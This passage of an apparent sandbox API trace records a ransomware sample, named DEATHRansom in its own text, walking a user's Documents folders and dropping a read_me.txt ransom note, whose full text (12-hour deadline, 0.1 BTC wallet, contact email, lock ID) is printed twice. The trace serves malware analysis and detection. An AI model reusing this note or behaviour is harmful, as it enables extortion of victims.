pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Q7wz4WHOl.xlsx") returned 59 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa70e1b0, ftCreationTime.dwHighDateTime=0x1d4c57f, ftLastAccessTime.dwLowDateTime=0xfe911e80, ftLastAccessTime.dwHighDateTime=0x1d4cd78, ftLastWriteTime.dwLowDateTime=0xfe911e80, ftLastWriteTime.dwHighDateTime=0x1d4cd78, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="7f5cSkJKHH.odp", cAlternateFileName="7F5CSK~1.ODP")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7f5cSkJKHH.odp") returned 58 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ece1c0, ftCreationTime.dwHighDateTime=0x1d52dad, ftLastAccessTime.dwLowDateTime=0x58bbda10, ftLastAccessTime.dwHighDateTime=0x1d56b41, ftLastWriteTime.dwLowDateTime=0x58bbda10, ftLastWriteTime.dwHighDateTime=0x1d56b41, nFileSizeHigh=0x0, nFileSizeLow=0x971f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BtMX4.xlsx", cAlternateFileName="BTMX4~1.XLS")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BtMX4.xlsx") returned 54 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbdcfcf0, ftCreationTime.dwHighDateTime=0x1d59fce, ftLastAccessTime.dwLowDateTime=0xf7cadbf0, ftLastAccessTime.dwHighDateTime=0x1d59009, ftLastWriteTime.dwLowDateTime=0xf7cadbf0, ftLastWriteTime.dwHighDateTime=0x1d59009, nFileSizeHigh=0x0, nFileSizeLow=0x7b7c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="h_xM5T0iANKAjSEQavw-.xlsx", cAlternateFileName="H_XM5T~1.XLS")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h_xM5T0iANKAjSEQavw-.xlsx") returned 69 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6aeb3100, ftCreationTime.dwHighDateTime=0x1d4d1f8, ftLastAccessTime.dwLowDateTime=0x890af30, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0x890af30, ftLastWriteTime.dwHighDateTime=0x1d4d540, nFileSizeHigh=0x0, nFileSizeLow=0x15612, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="IUl9jUZBgAS.ppt", cAlternateFileName="IUL9JU~1.PPT")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUl9jUZBgAS.ppt") returned 59 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237f1350, ftCreationTime.dwHighDateTime=0x1d593b2, ftLastAccessTime.dwLowDateTime=0x8849de50, ftLastAccessTime.dwHighDateTime=0x1d56798, ftLastWriteTime.dwLowDateTime=0x8849de50, ftLastWriteTime.dwHighDateTime=0x1d56798, nFileSizeHigh=0x0, nFileSizeLow=0x5ff8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="k040WIM4qywb6Jrj.pptx", cAlternateFileName="K040WI~1.PPT")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k040WIM4qywb6Jrj.pptx") returned 65 [0073.961] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0xfc3bd190, ftLastAccessTime.dwHighDateTime=0x1d4c84e, ftLastWriteTime.dwLowDateTime=0xfc3bd190, ftLastWriteTime.dwHighDateTime=0x1d4c84e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mxPjuqgnTcEZFOmeY", cAlternateFileName="MXPJUQ~1")) returned 1 [0073.961] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY") returned 61 [0073.961] lstrcmpW (lpString1="mxPjuqgnTcEZFOmeY", lpString2="..") returned 1 [0073.961] lstrcmpW (lpString1="mxPjuqgnTcEZFOmeY", lpString2=".") returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af10e0 [0073.962] lstrcpyW (in: lpString1=0x8af10e0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY" [0073.962] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 46 [0073.962] QueueUserWorkItem (Function=0x40a710, Context=0x8af10e0, Flags=0x0) returned 1 [0073.962] GetProcessHeap () returned 0x280000 [0073.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60028 [0073.963] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\*") returned 63 [0073.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0xfc3bd190, ftLastAccessTime.dwHighDateTime=0x1d4c84e, ftLastWriteTime.dwLowDateTime=0xfc3bd190, ftLastWriteTime.dwHighDateTime=0x1d4c84e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0073.963] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\.") returned 63 [0073.963] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.963] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0xfc3bd190, ftLastAccessTime.dwHighDateTime=0x1d4c84e, ftLastWriteTime.dwLowDateTime=0xfc3bd190, ftLastWriteTime.dwHighDateTime=0x1d4c84e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.963] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\..") returned 64 [0073.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.963] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0xe7217a60, ftLastAccessTime.dwHighDateTime=0x1d4d3d6, ftLastWriteTime.dwLowDateTime=0xe7217a60, ftLastWriteTime.dwHighDateTime=0x1d4d3d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="5HD-s7592GQ5SNRk8p", cAlternateFileName="5HD-S7~1")) returned 1 [0073.963] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p") returned 80 [0073.963] lstrcmpW (lpString1="5HD-s7592GQ5SNRk8p", lpString2="..") returned 1 [0073.963] lstrcmpW (lpString1="5HD-s7592GQ5SNRk8p", lpString2=".") returned 1 [0073.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70030 [0073.964] lstrcpyW (in: lpString1=0x8b70030, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p" [0073.964] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 47 [0073.964] QueueUserWorkItem (Function=0x40a710, Context=0x8b70030, Flags=0x0) returned 1 [0073.964] GetProcessHeap () returned 0x280000 [0073.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.966] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\*") returned 82 [0073.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0xe7217a60, ftLastAccessTime.dwHighDateTime=0x1d4d3d6, ftLastWriteTime.dwLowDateTime=0xe7217a60, ftLastWriteTime.dwHighDateTime=0x1d4d3d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0073.966] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\.") returned 82 [0073.966] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.966] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.966] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0xe7217a60, ftLastAccessTime.dwHighDateTime=0x1d4d3d6, ftLastWriteTime.dwLowDateTime=0xe7217a60, ftLastWriteTime.dwHighDateTime=0x1d4d3d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.966] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\..") returned 83 [0073.966] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.966] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb5d46e0, ftCreationTime.dwHighDateTime=0x1d4cb0b, ftLastAccessTime.dwLowDateTime=0x16be4190, ftLastAccessTime.dwHighDateTime=0x1d4cfb3, ftLastWriteTime.dwLowDateTime=0x16be4190, ftLastWriteTime.dwHighDateTime=0x1d4cfb3, nFileSizeHigh=0x0, nFileSizeLow=0x86fd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ha9eXoI5IE bhWM2.ods", cAlternateFileName="HA9EXO~1.ODS")) returned 1 [0073.966] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\ha9eXoI5IE bhWM2.ods") returned 101 [0073.966] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea9f3e70, ftCreationTime.dwHighDateTime=0x1d4d5a2, ftLastAccessTime.dwLowDateTime=0x8dc6f740, ftLastAccessTime.dwHighDateTime=0x1d4c541, ftLastWriteTime.dwLowDateTime=0x8dc6f740, ftLastWriteTime.dwHighDateTime=0x1d4c541, nFileSizeHigh=0x0, nFileSizeLow=0x1275f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WMV5qc1E.pdf", cAlternateFileName="")) returned 1 [0073.966] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\WMV5qc1E.pdf") returned 93 [0073.967] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcfd7f0, ftCreationTime.dwHighDateTime=0x1d4c90d, ftLastAccessTime.dwLowDateTime=0xc55e5a40, ftLastAccessTime.dwHighDateTime=0x1d4cf2d, ftLastWriteTime.dwLowDateTime=0xc55e5a40, ftLastWriteTime.dwHighDateTime=0x1d4cf2d, nFileSizeHigh=0x0, nFileSizeLow=0x3599, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wsd0Is2W12FK6wcFiQW.csv", cAlternateFileName="WSD0IS~1.CSV")) returned 1 [0073.967] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\wsd0Is2W12FK6wcFiQW.csv") returned 104 [0073.967] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcfd7f0, ftCreationTime.dwHighDateTime=0x1d4c90d, ftLastAccessTime.dwLowDateTime=0xc55e5a40, ftLastAccessTime.dwHighDateTime=0x1d4cf2d, ftLastWriteTime.dwLowDateTime=0xc55e5a40, ftLastWriteTime.dwHighDateTime=0x1d4cf2d, nFileSizeHigh=0x0, nFileSizeLow=0x3599, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wsd0Is2W12FK6wcFiQW.csv", cAlternateFileName="WSD0IS~1.CSV")) returned 0 [0073.967] FindClose (in: hFindFile=0x2b2738 | out: hFindFile=0x2b2738) returned 1 [0073.967] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\read_me.txt") returned 92 [0073.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\5hd-s7592gq5snrk8p\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0073.967] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.967] WriteFile (in: hFile=0x7bc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dbf4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17dbf4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.968] CloseHandle (hObject=0x7bc) returned 1 [0073.968] GetProcessHeap () returned 0x280000 [0073.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.968] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495da8b0, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0x95b5d880, ftLastAccessTime.dwHighDateTime=0x1d4c646, ftLastWriteTime.dwLowDateTime=0x95b5d880, ftLastWriteTime.dwHighDateTime=0x1d4c646, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Emjzu37kN6oU", cAlternateFileName="EMJZU3~1")) returned 1 [0073.968] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU") returned 74 [0073.968] lstrcmpW (lpString1="Emjzu37kN6oU", lpString2="..") returned 1 [0073.968] lstrcmpW (lpString1="Emjzu37kN6oU", lpString2=".") returned 1 [0073.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.968] lstrcpyW (in: lpString1=0x8a00060, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU" [0073.968] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 48 [0073.968] QueueUserWorkItem (Function=0x40a710, Context=0x8a00060, Flags=0x0) returned 1 [0073.968] GetProcessHeap () returned 0x280000 [0073.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a10068 [0073.969] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\*") returned 76 [0073.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495da8b0, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0x95b5d880, ftLastAccessTime.dwHighDateTime=0x1d4c646, ftLastWriteTime.dwLowDateTime=0x95b5d880, ftLastWriteTime.dwHighDateTime=0x1d4c646, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0073.971] lstrcpyW (in: lpString1=0x8a20070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI" [0073.971] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 49 [0073.971] QueueUserWorkItem (Function=0x40a710, Context=0x8a20070, Flags=0x0) returned 1 [0073.971] GetProcessHeap () returned 0x280000 [0073.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.971] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\*") returned 81 [0073.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\*", lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7505d5a0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x5e2e8d30, ftLastAccessTime.dwHighDateTime=0x1d4c641, ftLastWriteTime.dwLowDateTime=0x5e2e8d30, ftLastWriteTime.dwHighDateTime=0x1d4c641, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2778 [0073.974] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.974] WriteFile (in: hFile=0x7c0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d97c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, 